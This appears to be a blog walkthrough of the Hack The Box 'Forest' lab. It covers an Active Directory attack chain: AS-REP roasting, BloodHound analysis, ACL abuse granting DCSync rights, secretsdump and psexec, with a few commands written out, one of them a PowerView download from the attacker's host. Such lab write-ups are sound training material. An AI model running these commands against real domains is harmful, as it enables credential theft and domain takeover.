Persecure : my learning archive

,

HTB Forrest

https://app.hackthebox.com/machines/Forest

Enumeration

Nmap

A Domain Controller for the htb.local is found

SMB

RPC

Found a service account.
Found a service account

Let’s do a test for discovering a user that does not require a pre-Authentication

Create a user list with the found users.

Start up kerbrute

The user accounts that are enabled with no pre-Authentication, it’s vulnerable to AS-REP Roasting attack.

Use the Impackt GetNPUsers.py from here.

Run the python script to dump out the hash.

./GetNPUsers.py htb.local/svc-alfresco -no-pass -dc-ip 10.10.10.161

Use John to crack the hash.

Use evil-winrm to gain access.

First flag is found.

Use the bloodhound python script to collect JSON data for the Bloodhound app

Load the data to Bloodhound and look at svs-alfresco data

The node belongs to the account operators group.

Account Operators group are allowed create and modify users and add them to non-protected groups.

Download the Powerspoilt dev module from github and start a python server to transfer the PowerView script to the windows box.

powershell Invoke-WebRequest -Uri http://10.10.14.23:80/PowerView.ps1 -OutFile PowerView.ps1

Input the following commands 

$pass = convertto-securestring 'password' -AsPlainText -Force

$cred = New-Object System.Management.Automation.PSCredential ('HTB\persecure', $pass)

Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity persecure -

Use secretsdump.py to get the hashes.

Crack the hash with crackmapexec

Use psexec.py to gain a shell.

Root flag is found.

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Cancel

Connecting to %s

Comments (

0

)

%d bloggers like this: